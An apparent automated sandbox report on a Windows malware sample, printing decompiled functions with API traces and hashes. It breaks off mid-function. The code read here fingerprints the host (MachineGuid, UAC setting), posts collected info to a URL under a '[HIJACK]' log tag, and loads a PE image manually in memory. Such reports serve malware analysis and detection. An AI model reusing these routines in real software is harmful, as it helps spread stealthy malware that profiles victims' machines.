0x1001d2b4
0x1001d2bb
0x1001d2c2
0x1001d2de
0x1001d2e6
0x1001d2ff
0x1001d307
0x1001d312
0x1001d312
0x1001d319
0x1001d319
0x1001d325

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
RegQueryValueExW.KERNELBASE(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
RegCloseKey.ADVAPI32(00000000), ref: 1001D319

Strings

EnableLUA, xrefs: 1001D2F6
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D2D4

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
API String ID: 3677997916-2194944742
Opcode ID: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
Instruction ID: 8e6b4177a17e8aca07570e164a523334bb235141b85f1ba5573b08480178a58a
Opcode Fuzzy Hash: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
Instruction Fuzzy Hash: 9D01FFB6D00219FBEB04DFD1CD88BEEB7B8EB44305F104059E611B6180D7759B44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001A350, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A350(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;
				long _t11;
				long _t13;

				_v12 = 0;
				_v8 = 0;
				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
				if(_t11 == 0) {
					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
					if(_t13 == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					return _v12;
				}
				return 0;
			}

0x1001a356
0x1001a35d
0x1001a379
0x1001a381
0x1001a39c
0x1001a3a4
0x1001a3aa
0x1001a3aa
0x1001a3b5
0x00000000
0x1001a3bb
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A39C
RegCloseKey.ADVAPI32(00000000), ref: 1001A3B5

Strings

Software\Microsoft\Cryptography, xrefs: 1001A36F
MachineGuid, xrefs: 1001A393

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: MachineGuid$Software\Microsoft\Cryptography
API String ID: 3677997916-880526231
Opcode ID: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
Instruction ID: 036869a64e7b96092babc19efb2470d9694155ef05369fbbd3590e376cbd9c8c
Opcode Fuzzy Hash: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
Instruction Fuzzy Hash: 99F01275600208FBEB10DFA0DC85F9D77B9EB08700F604148FA14AB280DB75DB81DB65

Uniqueness

Uniqueness Score: -1.00%

Function 1001F500, Relevance: 7.6, APIs: 5, Instructions: 65
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F500(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				long _t27;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
				if(_t27 == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F2F0(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}

0x1001f506
0x1001f50d
0x1001f514
0x1001f52e
0x1001f536
0x1001f560
0x1001f562
0x1001f568
0x1001f56e
0x1001f574
0x1001f57a
0x1001f580
0x1001f586
0x1001f594
0x1001f5a0
0x1001f5a3
0x1001f5b4
0x1001f5b7
0x1001f5b7
0x1001f5be
0x1001f5be
0x1001f5cd

APIs

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F52E
RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F558
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F594
__aulldiv.LIBCMT ref: 1001F5AF
RegCloseKey.ADVAPI32(00000000), ref: 1001F5BE

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
String ID:
API String ID: 3147484438-0
Opcode ID: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
Instruction ID: f30bdbee4ac12bde428f6f044f578bd3b240634cd6c104924fe674acfb2d543b
Opcode Fuzzy Hash: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
Instruction Fuzzy Hash: 87210D75D10208ABEB00CFD4C898FEEB7B9FF48704F109148EA14BB290D7759A49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001F430, Relevance: 7.6, APIs: 5, Instructions: 61
timefileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F430(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				int _t28;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				_t28 = PathFileExistsA(_a4); // executed
				if(_t28 != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F2F0(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}

0x1001f436
0x1001f43d
0x1001f448
0x1001f450
0x1001f472
0x1001f479
0x1001f495
0x1001f49b
0x1001f4a1
0x1001f4a7
0x1001f4ad
0x1001f4b3
0x1001f4b9
0x1001f4c7
0x1001f4d0
0x1001f4d6
0x1001f4e7
0x1001f4ea
0x1001f4ea
0x1001f479
0x1001f4f6

APIs

PathFileExistsA.KERNELBASE(?), ref: 1001F448
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F46C
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F48B
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F4C7
__aulldiv.LIBCMT ref: 1001F4E2

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Time$CreateExistsPathSystem__aulldiv
String ID:
API String ID: 3038978132-0
Opcode ID: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
Instruction ID: 282c7306dc6b684cc064bb2559bb565ca804bda22c30e035a61ca1407b16c130
Opcode Fuzzy Hash: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
Instruction Fuzzy Hash: 4621EA75910208ABEB10DFD4D895FEEB7B8FF04704F108208E505BB290DB75A685CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10022DFB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10022DFB(void* __ebx, void* __edi, void* __esi) {
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t110;
				void* _t112;

				L0:
				while(1) {
					L0:
					_t109 = __esi;
					_t108 = __edi;
					_t77 = __ebx;
					 *((intOrPtr*)(_t110 - 0x2c)) =  *((intOrPtr*)(_t110 - 0x2c)) + 1;
					L1:
					_t118 =  *((intOrPtr*)(_t110 - 0x2c)) - 6;
					if( *((intOrPtr*)(_t110 - 0x2c)) <= 6) {
						L2:
						E100011C0(_t110 - 0x80, 0x10025cba);
						 *((intOrPtr*)(_t110 - 0xe8)) = E10022710(__ebx, __edi, __esi, _t118, _t110 - 0xbc,  *((intOrPtr*)(_t110 - 0x2c)));
						 *((intOrPtr*)(_t110 - 0xec)) =  *((intOrPtr*)(_t110 - 0xe8));
						 *((char*)(_t110 - 4)) = 5;
						E10001A70(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xec)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xbc);
						 *((intOrPtr*)(_t110 - 0xf0)) = E10001160(_t110 - 0xd8, _t118,  *((intOrPtr*)(_t110 + 0xc)));
						 *((intOrPtr*)(_t110 - 0xf4)) =  *((intOrPtr*)(_t110 - 0xf0));
						 *((char*)(_t110 - 4)) = 6;
						E10001A90(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xf4)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xd8);
						_push(E100011E0(_t110 - 0x80));
						_push(0x61);
						_push("post_info");
						E1001F230(__edi, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
						E100011C0(_t110 - 0x28, 0x10025cbb);
						E100011C0(_t110 - 0x48, 0x10025cce);
						_t72 = E10001200(_t110 - 0x64);
						_t73 = E100011E0(_t110 - 0x64);
						E10021C30(__ebx, __edi, __esi, _t118, 0, 0, 0, E100011E0(_t110 - 0x80), 2, 1, 0, _t73, _t72, 0, 0, 0, 0, 0, 0, _t110 - 0x28, _t110 - 0x48); // executed
						_t112 = _t112 + 0x60;
						_t76 = E10001200(_t110 - 0x28);
						_t119 = _t76;
						if(_t76 == 0) {
							L4:
							continue;
						}
					}
					L5:
					_push( *((intOrPtr*)(_t110 - 0x84)));
					E1000CA40(_t77, _t108, _t109, _t119);
					E10001110( *((intOrPtr*)(_t110 + 8)), _t119, _t110 - 0x48);
					 *(_t110 - 0xdc) =  *(_t110 - 0xdc) | 0x00000001;
					 *((char*)(_t110 - 4)) = 3;
					E100011A0(_t110 - 0x48);
					 *((char*)(_t110 - 4)) = 1;
					E100011A0(_t110 - 0x28);
					 *((char*)(_t110 - 4)) = 0;
					E100011A0(_t110 - 0x64);
					 *((intOrPtr*)(_t110 - 4)) = 0xffffffff;
					E100011A0(_t110 - 0x80);
					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
					return  *((intOrPtr*)(_t110 + 8));
					L6:
				}
			}

0x10022dfb
0x10022dfb
0x10022dfb
0x10022dfb
0x10022dfb
0x10022dfb
0x10022e01
0x10022e04
0x10022e04
0x10022e08
0x10022e0e
0x10022e16
0x10022e2e
0x10022e3a
0x10022e40
0x10022e4e
0x10022e53
0x10022e5d
0x10022e71
0x10022e7d
0x10022e83
0x10022e91
0x10022e96
0x10022ea0
0x10022ead
0x10022eae
0x10022eb0
0x10022ec6
0x10022ed6
0x10022ee3
0x10022eff
0x10022f08
0x10022f23
0x10022f28
0x10022f2e
0x10022f33
0x10022f35
0x10022f39
0x00000000
0x10022f39
0x10022f35
0x10022f3e
0x10022f44
0x10022f45
0x10022f54
0x10022f62
0x10022f68
0x10022f6f
0x10022f74
0x10022f7b
0x10022f80
0x10022f87
0x10022f8c
0x10022f96
0x10022fa1
0x10022fab
0x00000000
0x10022fab

APIs

Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA

Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293

Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC

Strings

.\post_info.cpp, xrefs: 10022EB5
post_info, xrefs: 10022EB0
[HIJACK][%s][%s][%d]: url = %s, xrefs: 10022EC1

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Http_memset$DebugFileFindLocalNameOpenOptionOutputPathStringTime
String ID: .\post_info.cpp$[HIJACK][%s][%s][%d]: url = %s$post_info
API String ID: 4078257140-115957201
Opcode ID: 2e5c64d8afcfb9ddf15bb862174beeccd90e78952ebceb7d9c30a92996c6efd8
Instruction ID: 4cd3f4f778056951b5cfd2b5c12ca28e1b0ee278467a54424c11d59ecdb1d103
Opcode Fuzzy Hash: 2e5c64d8afcfb9ddf15bb862174beeccd90e78952ebceb7d9c30a92996c6efd8
Instruction Fuzzy Hash: C1413D75D11248ABEB18DB94CC92FEDBB74EF18384F5080A8F60A77195EB302A45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A7A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001A7A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10023171);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10025c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF80(__edi,  &_v279, 0, 0x103);
				E1001DC60(__ebx, _t50, __esi,  &_v280); // executed
				_t46 =  &_v280;
				_t27 = E1000CAD0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D903( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A4E0(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA40(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x1001a7a0
0x1001a7a0
0x1001a7a0
0x1001a7a3
0x1001a7a5
0x1001a7b0
0x1001a7b1
0x1001a7be
0x1001a7d3
0x1001a7d8
0x1001a7df
0x1001a7f4
0x1001a803
0x1001a808
0x1001a80f
0x1001a814
0x1001a817
0x1001a819
0x1001a82c
0x1001a831
0x1001a831
0x1001a843
0x1001a856
0x1001a861
0x1001a862
0x1001a874
0x1001a882
0x1001a888
0x1001a895
0x1001a8a0
0x1001a8aa

APIs

_memset.LIBCMT ref: 1001A7F4

Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DC88
Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCA5
Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCBB
Part of subcall function 1001DC60: GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
Part of subcall function 1001DC60: _strcpy_s.LIBCMT ref: 1001DE09

_strlen.LIBCMT ref: 1001A80F
_strcpy_s.LIBCMT ref: 1001A82C

Strings

unknown err, xrefs: 1001A81B

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strcpy_s$Version_strlen
String ID: unknown err
API String ID: 3541540748-813478822
Opcode ID: efac7168300570dca757fc9347812aa854d67acda7d2ffe497c1877d970e4793
Instruction ID: 3aebd5af5d9b05859a12e4e17c573b0f64c0ee580e65f946a6305cb29b00d5b6
Opcode Fuzzy Hash: efac7168300570dca757fc9347812aa854d67acda7d2ffe497c1877d970e4793
Instruction Fuzzy Hash: A6217CB5C0021CABDB28DB64DD82BD9B774EB04750F4041E8B609A7285EB74BB84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 004051A9, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004051A9(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v3;
				void* _v8;
				signed short* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _t102;
				intOrPtr _t149;
				void* _t156;
				void* _t158;

				_v12 = _a4;
				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
					_v36 = _a4 + _v12[0x1e];
					if( *_v36 == 0x4550) {
						_v16 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x3000, 4);
						if(_v16 != 0) {
							L7:
							_v28 = VirtualAlloc(0, 0x1c, 0x3000, 4);
							if(_v28 != 0) {
								 *((intOrPtr*)(_v28 + 4)) = _v16;
								 *(_v28 + 8) = 0;
								 *((intOrPtr*)(_v28 + 0xc)) = _a8;
								 *((intOrPtr*)(_v28 + 0x10)) = _a12;
								 *((intOrPtr*)(_v28 + 0x14)) = _a16;
								0x8958a00a();
								asm("sbb [edx+0x4], ch");
								_v8 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, ??);
								E004053A9(_v8, _v12, _v12[0x1e] +  *(_v36 + 0x54));
								 *_v28 = _v8 + _v12[0x1e];
								 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
								E00405599(_a4, _v36, _v28); // executed
								_t158 = _t156 + 0x18;
								_t149 = _v16 -  *(_v36 + 0x34);
								_v32 = _t149;
								if(_t149 != 0) {
									E00405809(_v28, _v32);
									_t158 = _t158 + 8;
								}
								_t102 = E004058E9(_v28); // executed
								if(_t102 != 0) {
									E00405699(_v28); // executed
									if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
										L18:
										return _v28;
									}
									_v24 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
									_v20 = _v24(_v16, 1, 0);
									if(_v20 != 0) {
										 *(_v28 + 8) = 1;
										goto L18;
									}
									L19:
									return 0;
								}
								goto L19;
							}
							return 0;
						}
						_v16 = _a16(0,  *(_v36 + 0x50), 0x3000, 4);
						if(_v16 != 0) {
							goto L7;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x004051b2
0x004051c1
0x004051d3
0x004051df
0x00405200
0x00405207
0x0040522c
0x0040523a
0x00405241
0x00405250
0x00405256
0x00405263
0x0040526c
0x00405275
0x0040527a
0x00405280
0x00405296
0x004052ae
0x004052c2
0x004052cc
0x004052db
0x004052e0
0x004052e9
0x004052ec
0x004052ef
0x004052f9
0x004052fe
0x004052fe
0x00405305
0x0040530f
0x00405319
0x0040532a
0x0040535c
0x00000000
0x0040535c
0x00405337
0x00405345
0x0040534c
0x00405355
0x00000000
0x00405355
0x00405361
0x00000000
0x00405361
0x00000000
0x00405311
0x00000000
0x00405243
0x0040521c
0x00405223
0x00000000
0x00000000
0x00000000
0x00405225
0x00000000
0x004051e1
0x00000000

Strings

mQ@, xrefs: 0040525D, 0040532C, 00405315, 00405253, 004052F5, 004052CF, 00405321, 00405301, 0040527B, 00405278, 00405266, 004052C4, 0040524A, 004052BF, 0040526F, 004052D2, 004052F8, 00405304

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: mQ@
API String ID: 0-1781705956
Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
Instruction ID: 541d6754dc273e5e7774517d21eb6bbd513450c5919ac0484350b505b9df1b02
Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
Instruction Fuzzy Hash: 3F61EBB4E00609EFDB04CF94C885AAFBBB5FF48314F108559E905AB381D775A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405599, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 88
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405599(intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _t55;
				void* _t58;
				void* _t100;

				_t1 =  &_a12; // 0x4052e0
				_v20 =  *((intOrPtr*)( *_t1 + 4));
				_t4 =  &_a12; // 0x4052e0
				_t5 =  &_a12; // 0x4052e0
				_v24 =  *((intOrPtr*)( *_t4)) + ( *( *((intOrPtr*)( *_t5)) + 0x14) & 0x0000ffff) + 0x18;
				_v8 = 0;
				while(1) {
					_t15 =  &_a12; // 0x4052e0
					_t55 =  *((intOrPtr*)( *_t15));
					if(_v8 >= ( *(_t55 + 6) & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t39 =  &_v20; // 0x4052e0
						_t58 = VirtualAlloc( *_t39 +  *((intOrPtr*)(_v24 + 0xc)),  *(_v24 + 0x10), 0x1000, 4); // executed
						_v12 = _t58;
						E004053A9(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10));
						_t100 = _t100 + 0xc;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
					} else {
						_v16 =  *((intOrPtr*)(_a8 + 0x38));
						if(_v16 > 0) {
							_t26 =  &_v20; // 0x4052e0
							_t28 =  &_a12; // 0x4052e0
							_v12 =  *((intOrPtr*)( *((intOrPtr*)( *_t28 + 0x14))))( *_t26 +  *((intOrPtr*)(_v24 + 0xc)), _v16, 0x1000, 4);
							 *((intOrPtr*)(_v24 + 8)) = _v12;
							E00405369(_v12, _v12, 0, _v16);
							_t100 = _t100 + 0xc;
						}
					}
					_v8 = _v8 + 1;
					_v24 = _v24 + 0x28;
				}
				return _t55;
			}

0x0040559f
0x004055a5
0x004055a8
0x004055ad
0x004055ba
0x004055bd
0x004055d8
0x004055d8
0x004055db
0x004055e4
0x00000000
0x00000000
0x004055f1
0x00405650
0x0040565d
0x0040565f
0x00405677
0x0040567c
0x00405685
0x004055f3
0x004055f9
0x00405600
0x00405610
0x00405617
0x0040561f
0x00405628
0x00405635
0x0040563a
0x0040563a
0x0040563d
0x004055cc
0x004055d5
0x004055d5
0x00405690

APIs

VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004052E0,?,?), ref: 0040565D

Strings

R@, xrefs: 00405650, 00405610
R@, xrefs: 0040559F, 004055A8, 004055AD, 004055D8, 00405657, 00405617

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: R@$R@
API String ID: 4275171209-183225046
Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
Instruction ID: 8040a1e4124e533603aae13ccacedffe6b0048f7b84320d0b4bad592607f7773
Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
Instruction Fuzzy Hash: 0F41BAB4A00209DFCB08CF88C990AAEB7B1FF48304F208559E915AB395D775EE51CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000CEBD, Relevance: 4.6, APIs: 3, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000CEBD(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10335310; // 0x660000
					_t20 = _t30;
					if(_t32 == 0) {
						E10011F42(_t12, _t18, _t20, _t32);
						E10011DA2(0x1e);
						E10011B04(0xff);
					}
					_t1 =  *0x10337f3c;
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE60(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10335310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103357e4 == _t2) {
